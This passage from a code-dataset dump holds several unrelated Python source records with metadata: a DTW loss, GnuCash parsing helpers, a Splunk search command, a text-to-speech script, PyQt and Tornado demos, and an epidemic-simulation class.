rho=self.rho)\n                dist.append(d_b)\n            d = T.mean(T.stack(dist))\n        else:\n            d, cost_matrix, diff_acc_cost_matrix, diff_path = diff_dtw_loss(output, target, dist=euclidean_norm, rho=self.rho)\n        #F.mse_loss(output, target, reduction=self.reduction)\n        loss_val = d #.detach().numpy()\n        return loss_val\n\nx = np.array([2, 0, 1, 1, 2, 4, 2, 1, 2, 0], dtype=np.float32).reshape(1, -1, 1)\ny = np.array([1, 1, 2, 4, 2, 1, 2, 0], dtype=np.float32).reshape(1, -1, 1)\n\ntensor_x = T.tensor(T.from_numpy(x),requires_grad=True)\ntensor_y = T.tensor(T.from_numpy(y),requires_grad=True)\nloss_vals = []\n\nrhos = np.linspace(1, 10,10)\n#for rho in rhos:\n    #print(rho)\n    #my_loss = DTW_Loss(rho)\n    #loss_vals.append(my_loss(tensor_x, tensor_y))\n", "sub_path": "Peg In Hole HDR-IL/differentiableDP.py", "file_name": "differentiableDP.py", "file_ext": "py", "file_size_in_byte": 8531, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "numpy.array", "line_number": 11, "usage_type": "call"}, {"api_name": "numpy.argmin", "line_number": 14, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.inf", "line_number": 26, "usage_type": "name"}, {"api_name": "math.isinf", "line_number": 39, "usage_type": "call"}, {"api_name": "math.isinf", "line_number": 42, "usage_type": "call"}, {"api_name": "numpy.full", "line_number": 43, "usage_type": "call"}, {"api_name": "numpy.inf", "line_number": 43, "usage_type": "argument"}, {"api_name": "numpy.zeros", "line_number": 48, "usage_type": "call"}, {"api_name": "numpy.inf", "line_number": 49, "usage_type": "name"}, {"api_name": "numpy.inf", "line_number": 50, "usage_type": "name"}, {"api_name": "math.isinf", "line_number": 54, "usage_type": "call"}, {"api_name": "math.isinf", "line_number": 59, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 69, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 71, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 80, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 81, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 84, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 92, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 92, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 93, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 93, "usage_type": "name"}, {"api_name": "torch.log", "line_number": 102, "usage_type": "call"}, {"api_name": "torch.mean", "line_number": 102, "usage_type": "call"}, {"api_name": "torch.exp", "line_number": 102, "usage_type": "call"}, {"api_name": "torch.mean", "line_number": 103, "usage_type": "call"}, {"api_name": "torch.exp", "line_number": 103, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 107, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 116, "usage_type": "call"}, {"api_name": "numpy.argmin", "line_number": 119, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 129, "usage_type": "call"}, {"api_name": "numpy.inf", "line_number": 132, "usage_type": "name"}, {"api_name": "math.isinf", "line_number": 141, "usage_type": "call"}, {"api_name": "math.isinf", "line_number": 147, "usage_type": "call"}, {"api_name": "torch.full", "line_number": 148, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 153, "usage_type": "call"}, {"api_name": "math.isinf", 
"line_number": 160, "usage_type": "call"}, {"api_name": "math.isinf", "line_number": 165, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 173, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 173, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 174, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 175, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 181, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 183, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 190, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 190, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 191, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 191, "usage_type": "attribute"}, {"api_name": "torch.tensor", "line_number": 194, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 194, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 195, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 195, "usage_type": "call"}, {"api_name": "torch.abs", "line_number": 198, "usage_type": "call"}, {"api_name": "torch.nn.modules.Module", "line_number": 228, "usage_type": "name"}, {"api_name": "numpy.ndim", "line_number": 244, "usage_type": "call"}, {"api_name": "torch.mean", "line_number": 250, "usage_type": "call"}, {"api_name": "torch.stack", "line_number": 250, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 257, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 257, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 258, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 258, "usage_type": "attribute"}, {"api_name": "torch.tensor", "line_number": 260, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 260, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 261, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 261, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 264, "usage_type": "call"}]}
+{"seq_id": "548821273", "text": "import cPickle\nimport gzip\nimport os.path\nimport sys\nfrom subprocess import PIPE, Popen\nfrom warnings import warn\n\nimport yaml\n\nfrom koert.gnucash.xmlformat import SaxHandler\n\n\ndef open_gcf_in_git_repo(repopath, filepath, cachepath=None, scheme=None):\n from git import Repo\n\n repo = Repo(repopath)\n commit = repo.head.commit\n mtime = commit.authored_date\n f = commit.tree[filepath].data_stream\n\n result = parse_gcf(f, mtime, cachepath=cachepath, scheme=scheme)\n\n f.read()\n\n return result\n\n\ndef open_pos_gzipped(filepath):\n f = None\n try:\n # Only after a byte is read, is the check whether filepath\n # points to a gzipped file performed.\n f = gzip.open(filepath)\n f.read(1)\n f.rewind()\n except IOError:\n # message should read: \"Not a gzipped file\"\n f = open(filepath)\n return f\n\n\ndef saxparse(f, handler):\n from xml.sax import parse as saxparse\n saxparse(f, handler)\n\n\ndef lxmlparse(f, handler):\n from lxml.etree import parse as lxmlparse\n from lxml.sax import saxify\n etree = lxmlparse(f)\n saxify(etree, handler)\n\n\ndef cache_path(filepath):\n return filepath + \".pickled\"\n\n\ndef get_commit_name():\n directory = os.path.dirname(__file__)\n p = Popen('git rev-parse HEAD',\n stdout=PIPE, shell=True, cwd=directory)\n outp, err = p.communicate()\n return outp\n\n\ndef load_cache(cachepath, mtime):\n if not os.path.exists(cachepath):\n return False\n # Do not use the cache if the gnucash file is newer\n if mtime >= os.path.getmtime(cachepath):\n return False\n with open(cachepath, \"r\") as f:\n current_commit_name = get_commit_name()\n try:\n cached_commit_name, gcf = cPickle.load(f)\n if cached_commit_name != current_commit_name:\n return False\n print(\"loaded cache %s\" % cachepath)\n return gcf\n except Exception as e:\n warn(\"Failed to load pickled cache of Gnucash file \"\n \"'%s': %s\" % (cachepath, repr(e)))\n return False\n\n\ndef update_cache(cachepath, gcf):\n if sys.getrecursionlimit() < 2000:\n sys.setrecursionlimit(2000)\n with open(cachepath, \"w\") as f:\n try:\n cPickle.dump((get_commit_name(), gcf), f)\n except RuntimeError as e:\n warn(\"\"\"Failed to dump a pickled version of the \\\ngnucash file \"%s\" due to the RuntimeError below. 
If this is a stack \\\noverflow, you might want to increase the maximum recursion depth by \\\nsys.setrecursionlimit.\"\"\" % cachepath)\n            raise e\n\n\ndef parse_gcf(f, mtime, scheme=None, parse=saxparse, cachepath=None):\n    if cachepath is not None:\n        result = load_cache(cachepath, mtime)\n        if result:\n            return result\n    handler = SaxHandler(scheme)\n    parse(f, handler)\n    result = handler.result\n    result.mtime = mtime\n    if cachepath is not None:\n        update_cache(cachepath, result)\n    return result\n\n\ndef open_gcf(filepath, scheme=None, parse=saxparse, cachepath=None):\n    if cachepath is None:\n        cachepath = cache_path(filepath)\n    with open(filepath) as f:\n        return parse_gcf(f, os.path.getmtime(filepath),\n                         scheme=scheme, parse=parse, cachepath=cachepath)\n\n\ndef open_yaml(path):\n    with open(path) as f:\n        d = yaml.load(f)\n\n    dirname = os.path.dirname(path)\n    gcf_path = os.path.join(dirname, d['path'])\n    cache_path = None\n    if \"cache\" in d:\n        cache_path = os.path.join(dirname, d['cache'])\n    gcf = None\n    if 'repo' in d:\n        repo_path = os.path.join(dirname, d['repo'])\n        gcf = open_gcf_in_git_repo(repo_path, d['path'], cachepath=cache_path)\n    else:\n        gcf = open_gcf(gcf_path, cachepath=cache_path)\n    if 'meta' in d:\n        gcf.meta = d['meta']\n\n    return gcf\n", "sub_path": "sm/gnucash/tools.py", "file_name": "tools.py", "file_ext": "py", "file_size_in_byte": 3788, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "git.Repo", "line_number": 16, "usage_type": "call"}, {"api_name": "gzip.open", "line_number": 33, "usage_type": "call"}, {"api_name": "xml.sax.parse", "line_number": 44, "usage_type": "call"}, {"api_name": "lxml.etree.parse", "line_number": 50, "usage_type": "call"}, {"api_name": "lxml.sax.saxify", "line_number": 51, "usage_type": "call"}, {"api_name": "os.path.path.dirname", "line_number": 59, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 59, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 59, "usage_type": "name"}, {"api_name": "subprocess.Popen", "line_number": 60, "usage_type": "call"}, {"api_name": "subprocess.PIPE", "line_number": 61, "usage_type": "name"}, {"api_name": "os.path.path.exists", "line_number": 67, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 67, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 67, "usage_type": "name"}, {"api_name": "os.path.path.getmtime", "line_number": 70, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 70, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 70, "usage_type": "name"}, {"api_name": "cPickle.load", "line_number": 75, "usage_type": "call"}, {"api_name": "warnings.warn", "line_number": 81, "usage_type": "call"}, {"api_name": "sys.getrecursionlimit", "line_number": 87, "usage_type": "call"}, {"api_name": "sys.setrecursionlimit", "line_number": 88, "usage_type": "call"}, {"api_name": "cPickle.dump", "line_number": 91, "usage_type": "call"}, {"api_name": "warnings.warn", "line_number": 93, "usage_type": "call"}, {"api_name": "xml.sax.parse", "line_number": 100, "usage_type": "name"}, {"api_name": "koert.gnucash.xmlformat.SaxHandler", "line_number": 105, "usage_type": "call"}, {"api_name": "xml.sax.parse", "line_number": 113, "usage_type": "name"}, {"api_name": "os.path.path.getmtime", "line_number": 117, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 117, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 117, "usage_type": "name"}, {"api_name": "yaml.load", 
"line_number": 123, "usage_type": "call"}, {"api_name": "os.path.path.dirname", "line_number": 125, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 125, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 125, "usage_type": "name"}, {"api_name": "os.path.path.join", "line_number": 126, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 126, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 126, "usage_type": "name"}, {"api_name": "os.path.path.join", "line_number": 129, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 129, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 129, "usage_type": "name"}, {"api_name": "os.path.path.join", "line_number": 132, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 132, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 132, "usage_type": "name"}]}
+{"seq_id": "190884705", "text": "import sys\nimport json\nfrom splunklib.searchcommands import dispatch, StreamingCommand, Configuration, Option\nfrom splunklib.searchcommands.validators import Fieldname\nimport environment_data\n\n\n@Configuration(local=True)\nclass EnvironmentInstancesUpdateState(StreamingCommand):\n\n state_field = Option(validate=Fieldname())\n name_field = Option(validate=Fieldname())\n\n def stream(self, instances):\n for instance in instances:\n environment_id = instance[\"environment_id\"]\n instance_state = instance[self.state_field]\n instance_name = instance[self.name_field]\n\n self.service.post(\"/services/msaas/environments/%s/instances/%s\" % (environment_id, instance_name), body=json.dumps({\n \"state\": instance_state,\n }))\n # environment_data.update_instance(\n # self.service, environment_id, instance_name,\n # instance_state=instance_state)\n yield instance\n\ndispatch(EnvironmentInstancesUpdateState,\n sys.argv, sys.stdin, sys.stdout, __name__)\n", "sub_path": "apps/msaas/bin/environment_instances_update_state_command.py", "file_name": "environment_instances_update_state_command.py", "file_ext": "py", "file_size_in_byte": 1069, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "splunklib.searchcommands.StreamingCommand", "line_number": 9, "usage_type": "name"}, {"api_name": "splunklib.searchcommands.Option", "line_number": 11, "usage_type": "call"}, {"api_name": "splunklib.searchcommands.validators.Fieldname", "line_number": 11, "usage_type": "call"}, {"api_name": "splunklib.searchcommands.Option", "line_number": 12, "usage_type": "call"}, {"api_name": "splunklib.searchcommands.validators.Fieldname", "line_number": 12, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 20, "usage_type": "call"}, {"api_name": "splunklib.searchcommands.Configuration", "line_number": 8, "usage_type": "call"}, {"api_name": "splunklib.searchcommands.dispatch", "line_number": 28, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 29, "usage_type": "attribute"}, {"api_name": "sys.stdin", "line_number": 29, "usage_type": "attribute"}, {"api_name": "sys.stdout", "line_number": 29, "usage_type": "attribute"}]}
+{"seq_id": "210347852", "text": "import os\nos.environ[\"GOOGLE_APPLICATION_CREDENTIALS\"] = './config/My Project-bd8af4dfa881.json'\nfrom google.cloud import texttospeech\nimport base64\nimport subprocess\nfrom pydub import AudioSegment\nfrom pydub.playback import play\nimport io\n\n\n\ndef create_google_sst(text):\n client = texttospeech.TextToSpeechClient()\n synthesis_input = texttospeech.types.SynthesisInput(text=text)\n voice = texttospeech.types.VoiceSelectionParams(\n name=\"en-US-Wavenet-F\",\n language_code='en-US', \n ssml_gender=texttospeech.enums.SsmlVoiceGender.FEMALE\n )\n audio_config = texttospeech.types.AudioConfig(\n audio_encoding=texttospeech.enums.AudioEncoding.MP3,\n pitch=2.0,\n speaking_rate=1.26\n )\n \n response = client.synthesize_speech(synthesis_input, voice, audio_config)\n audio = base64.b64decode(response.audio_content)\n\n song = AudioSegment.from_file(io.BytesIO(audio), format=\"mp3\")\n play(song)\n\ncreate_google_sst(\"how can I help you ?\")", "sub_path": "scrath.py", "file_name": "scrath.py", "file_ext": "py", "file_size_in_byte": 1028, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "os.environ", "line_number": 2, "usage_type": "attribute"}, {"api_name": "google.cloud.texttospeech.TextToSpeechClient", "line_number": 13, "usage_type": "call"}, {"api_name": "google.cloud.texttospeech", "line_number": 13, "usage_type": "name"}, {"api_name": "google.cloud.texttospeech.types.SynthesisInput", "line_number": 14, "usage_type": "call"}, {"api_name": "google.cloud.texttospeech.types", "line_number": 14, "usage_type": "attribute"}, {"api_name": "google.cloud.texttospeech", "line_number": 14, "usage_type": "name"}, {"api_name": "google.cloud.texttospeech.types.VoiceSelectionParams", "line_number": 15, "usage_type": "call"}, {"api_name": "google.cloud.texttospeech.types", "line_number": 15, "usage_type": "attribute"}, {"api_name": "google.cloud.texttospeech", "line_number": 15, "usage_type": "name"}, {"api_name": "google.cloud.texttospeech.enums", "line_number": 18, "usage_type": "attribute"}, {"api_name": "google.cloud.texttospeech", "line_number": 18, "usage_type": "name"}, {"api_name": "google.cloud.texttospeech.types.AudioConfig", "line_number": 20, "usage_type": "call"}, {"api_name": "google.cloud.texttospeech.types", "line_number": 20, "usage_type": "attribute"}, {"api_name": "google.cloud.texttospeech", "line_number": 20, "usage_type": "name"}, {"api_name": "google.cloud.texttospeech.enums", "line_number": 21, "usage_type": "attribute"}, {"api_name": "google.cloud.texttospeech", "line_number": 21, "usage_type": "name"}, {"api_name": "base64.b64decode", "line_number": 27, "usage_type": "call"}, {"api_name": "pydub.AudioSegment.from_file", "line_number": 29, "usage_type": "call"}, {"api_name": "pydub.AudioSegment", "line_number": 29, "usage_type": "name"}, {"api_name": "io.BytesIO", "line_number": 29, "usage_type": "call"}, {"api_name": "pydub.playback.play", "line_number": 30, "usage_type": "call"}]}
+{"seq_id": "620220901", "text": "import sys, subprocess\nfrom PyQt5.QtWidgets import QWidget, QVBoxLayout, QHBoxLayout, QTreeWidget, QTreeWidgetItem, QGroupBox, QPushButton, QApplication\nfrom PyQt5 import QtCore\n\nclass MyApp(object): \n def __init__(self):\n super(MyApp, self).__init__() \n self.mainWidget = QWidget()\n self.mainLayout = QVBoxLayout()\n self.mainWidget.setLayout(self.mainLayout)\n\n self.hLayout = QHBoxLayout()\n self.mainLayout.insertLayout(0, self.hLayout)\n\n\n self.listA=QTreeWidget()\n self.listA.setColumnCount(3)\n self.listA.setHeaderLabels(['Checkbox','Name','Data'])\n for i in range(3):\n item=QTreeWidgetItem()\n item.setCheckState(0, 2)\n item.setText(1, 'Item '+str(i))\n item.setData(2, 256, id(item) )\n item.setText(2, str(id(item) ) )\n self.listA.addTopLevelItem(item)\n\n self.hLayout.addWidget(self.listA)\n\n self.buttonGroupbox = QGroupBox()\n self.buttonlayout = QVBoxLayout()\n self.buttonGroupbox.setLayout(self.buttonlayout)\n\n okButton = QPushButton('Remove Selected')\n okButton.clicked.connect(self.removeSel)\n self.buttonlayout.addWidget(okButton)\n\n getDataButton = QPushButton('Get Items Data')\n getDataButton.clicked.connect(self.getItemsData)\n self.buttonlayout.addWidget(getDataButton)\n\n self.mainLayout.addWidget(self.buttonGroupbox)\n self.mainWidget.show()\n sys.exit(app.exec_())\n\n def removeSel(self):\n listItems = []\n for i in range(self.listA.topLevelItemCount()):\n item=self.listA.topLevelItem(i)\n print(\"item\", item)\n if (item.checkState(0) == 2):\n listItems.append(item)\n\n print(\"listItems: \",listItems)\n\n for item in listItems:\n print(\"item: \", item)\n itemIndex=self.listA.indexOfTopLevelItem(item)\n print(\"itemIndex\", itemIndex)\n self.listA.takeTopLevelItem(itemIndex)\n print('\\n\\t Number of items remaining', self.listA.topLevelItemCount())\n\n def getItemsData(self):\n for i in range(self.listA.topLevelItemCount()):\n item=self.listA.topLevelItem(i)\n itmData=item.data(2, 256)\n print('\\n\\t Item Id Stored as Item Data:', itmData, 'Item Checkbox State:', item.checkState(0))\n\nif __name__ == '__main__':\n what = subprocess.Popen(['adb', 'devices', '-l'], stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n out, errs = what.communicate()\n out = str(out, 'utf-8')\n outs = out.split()\n del outs[0:4]\n length = len(outs)\n n = length/6\n struct = [[] for i in range(int(n))]\n for i in range(int(n)):\n print(n, i)\n struct[i] = outs[i*6:(i+1)*6]\n print(struct[i])\n app = QApplication(sys.argv)\n MyApp()", "sub_path": "PythGUI/gui2.py", "file_name": "gui2.py", "file_ext": "py", "file_size_in_byte": 2871, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "PyQt5.QtWidgets.QWidget", "line_number": 8, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QVBoxLayout", "line_number": 9, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QHBoxLayout", "line_number": 12, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QTreeWidget", "line_number": 16, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QTreeWidgetItem", "line_number": 20, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QGroupBox", "line_number": 29, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QVBoxLayout", "line_number": 30, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QPushButton", "line_number": 33, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QPushButton", "line_number": 37, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 43, 
"usage_type": "call"}, {"api_name": "subprocess.Popen", "line_number": 69, "usage_type": "call"}, {"api_name": "subprocess.PIPE", "line_number": 69, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets.QApplication", "line_number": 81, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 81, "usage_type": "attribute"}]}
+{"seq_id": "617248015", "text": "import tornado.ioloop\nimport tornado.web\nimport psycopg2.extras\nimport notorm\nimport tornado.autoreload\n\nclass Game(notorm.record):\n _fields = {'id':None,\n 'name':None\n }\n\n insert_qry = \"\"\"\n insert into game (name)\n values(%(name)s)\n returning id\n \"\"\"\n\n update_qry = \"\"\"\n update game set name=%(name)s where id = %(id)s\n \"\"\"\n\n @classmethod\n def get(cls, game_id):\n cursor = notorm.db.cursor(cursor_factory=psycopg2.extras.NamedTupleCursor)\n cursor.execute(\"\"\"select game.*::game from game where id = %(game_id)s\"\"\",\n {'game_id': game_id})\n\n results = cursor.fetchall()\n games = notorm.build_relationships(results, 'game')\n if not games:\n return None\n return games[0]\n\n @classmethod\n def get_all(cls):\n cursor = notorm.db.cursor(cursor_factory=psycopg2.extras.NamedTupleCursor)\n cursor.execute(\"\"\"select game.*::game from game order by name\"\"\")\n\n results = cursor.fetchall()\n games = notorm.build_relationships(results, 'game')\n return games\n\nclass GameComposite(psycopg2.extras.CompositeCaster):\n def make(self, values):\n d = dict(zip(self.attnames, values))\n return Game(**d)\n\nclass ExampleRequestHandler(tornado.web.RequestHandler):\n def on_finish(self):\n notorm.db.commit()\n\n def log_exception(self, typ, value, tb):\n print(\"Exception\")\n notorm.db.rollback()\n return super(ExampleRequestHandler, self).log_exception(typ, value, tb)\n\nclass MainHandler(ExampleRequestHandler):\n def get(self):\n games = Game.get_all()\n self.render(\"../main.html\", games=games)\n\nclass GameHandler(ExampleRequestHandler):\n def get(self, game_id=None):\n if game_id:\n game = Game.get(game_id)\n else:\n game = Game()\n self.render(\"../edit.html\", game=game)\n\n def post(self, game_id=None):\n if game_id:\n game = Game.get(game_id)\n else:\n game = Game()\n game.name = self.get_argument('name')\n game.save()\n self.redirect(\"/\")\n\ndef make_app():\n return tornado.web.Application([\n (r\"/\", MainHandler),\n (r\"/game/new\", GameHandler),\n (r\"/game/([0-9]+)\", GameHandler)\n ])\n\nif __name__ == \"__main__\":\n notorm.db = psycopg2.connect(\"dbname=notorm_example user=dbuser\")\n\n cursor = notorm.db.cursor()\n psycopg2.extras.register_composite('game', cursor, globally=True, factory = GameComposite)\n app = make_app()\n app.listen(8888)\n tornado.autoreload.start(tornado.ioloop.IOLoop.current())\n tornado.ioloop.IOLoop.current().start()", "sub_path": "examples/tornadosync/tornadosync.py", "file_name": "tornadosync.py", "file_ext": "py", "file_size_in_byte": 2690, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "notorm.record", "line_number": 7, "usage_type": "attribute"}, {"api_name": "notorm.db.cursor", "line_number": 24, "usage_type": "call"}, {"api_name": "notorm.db", "line_number": 24, "usage_type": "attribute"}, {"api_name": "psycopg2.extras.extras", "line_number": 24, "usage_type": "attribute"}, {"api_name": "psycopg2.extras", "line_number": 24, "usage_type": "name"}, {"api_name": "notorm.build_relationships", "line_number": 29, "usage_type": "call"}, {"api_name": "notorm.db.cursor", "line_number": 36, "usage_type": "call"}, {"api_name": "notorm.db", "line_number": 36, "usage_type": "attribute"}, {"api_name": "psycopg2.extras.extras", "line_number": 36, "usage_type": "attribute"}, {"api_name": "psycopg2.extras", "line_number": 36, "usage_type": "name"}, {"api_name": "notorm.build_relationships", "line_number": 40, "usage_type": 
"call"}, {"api_name": "psycopg2.extras.extras", "line_number": 43, "usage_type": "attribute"}, {"api_name": "psycopg2.extras", "line_number": 43, "usage_type": "name"}, {"api_name": "tornado.ioloop.web", "line_number": 48, "usage_type": "attribute"}, {"api_name": "tornado.ioloop", "line_number": 48, "usage_type": "name"}, {"api_name": "notorm.db.commit", "line_number": 50, "usage_type": "call"}, {"api_name": "notorm.db", "line_number": 50, "usage_type": "attribute"}, {"api_name": "notorm.db.rollback", "line_number": 54, "usage_type": "call"}, {"api_name": "notorm.db", "line_number": 54, "usage_type": "attribute"}, {"api_name": "tornado.ioloop.web.Application", "line_number": 80, "usage_type": "call"}, {"api_name": "tornado.ioloop.web", "line_number": 80, "usage_type": "attribute"}, {"api_name": "tornado.ioloop", "line_number": 80, "usage_type": "name"}, {"api_name": "notorm.db", "line_number": 87, "usage_type": "attribute"}, {"api_name": "psycopg2.extras.connect", "line_number": 87, "usage_type": "call"}, {"api_name": "psycopg2.extras", "line_number": 87, "usage_type": "name"}, {"api_name": "notorm.db.cursor", "line_number": 89, "usage_type": "call"}, {"api_name": "notorm.db", "line_number": 89, "usage_type": "attribute"}, {"api_name": "psycopg2.extras.extras.register_composite", "line_number": 90, "usage_type": "call"}, {"api_name": "psycopg2.extras.extras", "line_number": 90, "usage_type": "attribute"}, {"api_name": "psycopg2.extras", "line_number": 90, "usage_type": "name"}, {"api_name": "tornado.ioloop.autoreload.start", "line_number": 93, "usage_type": "call"}, {"api_name": "tornado.ioloop.autoreload", "line_number": 93, "usage_type": "attribute"}, {"api_name": "tornado.ioloop", "line_number": 93, "usage_type": "name"}, {"api_name": "tornado.ioloop.ioloop.IOLoop.current", "line_number": 93, "usage_type": "call"}, {"api_name": "tornado.ioloop.ioloop", "line_number": 93, "usage_type": "attribute"}, {"api_name": "tornado.ioloop.ioloop.IOLoop.current", "line_number": 94, "usage_type": "call"}, {"api_name": "tornado.ioloop.ioloop", "line_number": 94, "usage_type": "attribute"}, {"api_name": "tornado.ioloop", "line_number": 94, "usage_type": "name"}]}
+{"seq_id": "545420405", "text": "import random\nfrom datetime import datetime, timedelta\n\nfrom Person import Person\n\n\nclass Place:\n\n def __init__(self, place_info):\n self.population = set()\n self.place_info = place_info # (40.760265, -73.989105, 'Italian', '217', '291', 'Ristorante Da Rosina')\n self.time_to_recover = 14\n self.total_infected_number = 0\n self.immune_population = set()\n\n def get_population(self):\n return self.population\n\n def get_total_infected(self):\n return self.total_infected_number\n\n def set_population(self, new_population):\n self.population = new_population\n\n def set_total_movements(self, number):\n self.total_movements = number\n self.init_population(self.total_movements) # initilise population according to place popularity\n\n def init_population(self, number):\n start_time = datetime(2010, 12, 21, 20, 0, 0)\n for i in range(number):\n person = Person()\n # infect with a certain probability\n if random.random() <= 0.001:\n person.set_infected(start_time)\n self.add_person(person)\n\n def get_total_movements(self):\n return self.total_movements\n\n def add_person(self, person):\n self.population.add(person)\n\n def incubate_cycle(self, current_time_o):\n ''' Process local population at a place and yield a new cycle of infections '''\n\n # set recovered timedelta(days=1): set time_to_recover, current_time\n infected_pop = [p for p in self.population if p.get_status() == 1]\n recovered_pop = [p.set_immune(current_time_o) for p in infected_pop if\n current_time_o - p.get_time_infected() > timedelta(days=self.time_to_recover)]\n infected_pop = set(infected_pop).difference(recovered_pop) # infected pop - recovered\n # print (len(infected_pop))\n # print (len(recovered_pop))\n # print (len(self.population))\n # print ('----')\n\n # calculate number of infected people\n total_infected = len(infected_pop)\n # if total_infected == 0:\n # \t#if there is no infected person at place, no one else can be infected (ie do not execute code below)\n # \treturn\n\n total_pop = len(self.population)\n\n # calculate susceptible to infection\n susceptible_pop = self.population.difference(infected_pop)\n susceptible_pop = susceptible_pop.difference(self.immune_population)\n self.immune_population = self.immune_population.union(recovered_pop)\n\n # calculate probability of infection\n if total_pop == 0:\n prob_infection = 0.0\n else:\n prob_infection = total_infected / total_pop\n\n # calculate newly infected number\n newly_infected_num = int(len(susceptible_pop) * prob_infection)\n\n # set newly infected persons accordingly\n newly_infected_pop = random.choices(tuple(susceptible_pop), k=newly_infected_num)\n for i in range(newly_infected_num):\n newly_infected_pop[i].set_infected(current_time_o)\n\n # count number infected\n self.total_infected_number = len(infected_pop) + newly_infected_num\n\n def set_recovered(self):\n ''' Process local population and yield a new cycle of recoveries (death case will be added later)'''\n pass\n", "sub_path": "Place.py", "file_name": "Place.py", "file_ext": "py", "file_size_in_byte": 3342, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "datetime.datetime", "line_number": 30, "usage_type": "call"}, {"api_name": "Person.Person", "line_number": 32, "usage_type": "call"}, {"api_name": "random.random", "line_number": 34, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 50, "usage_type": "call"}, {"api_name": "random.choices", "line_number": 
80, "usage_type": "call"}]}
+{"seq_id": "541244773", "text": "from Acquisition import aq_parent\nfrom ftw.solr.interfaces import ISolrSearch\nfrom ftw.solr.query import make_filters\nfrom opengever.base.browser.navigation import make_tree_by_url\nfrom opengever.base.interfaces import IOpengeverBaseLayer\nfrom opengever.base.solr import OGSolrDocument\nfrom opengever.repository.interfaces import IRepositoryFolder\nfrom opengever.repository.repositoryfolder import REPOSITORY_FOLDER_STATE_INACTIVE\nfrom opengever.repository.repositoryroot import IRepositoryRoot\nfrom plone.app.contentlisting.interfaces import IContentListingObject\nfrom plone.restapi.interfaces import IExpandableElement\nfrom plone.restapi.serializer.converters import json_compatible\nfrom plone.restapi.services import Service\nfrom Products.CMFPlone.interfaces.siteroot import IPloneSiteRoot\nfrom zExceptions import BadRequest\nfrom zope.component import adapter\nfrom zope.component import getUtility\nfrom zope.dottedname.resolve import resolve\nfrom zope.interface import implementer\nfrom zope.interface import 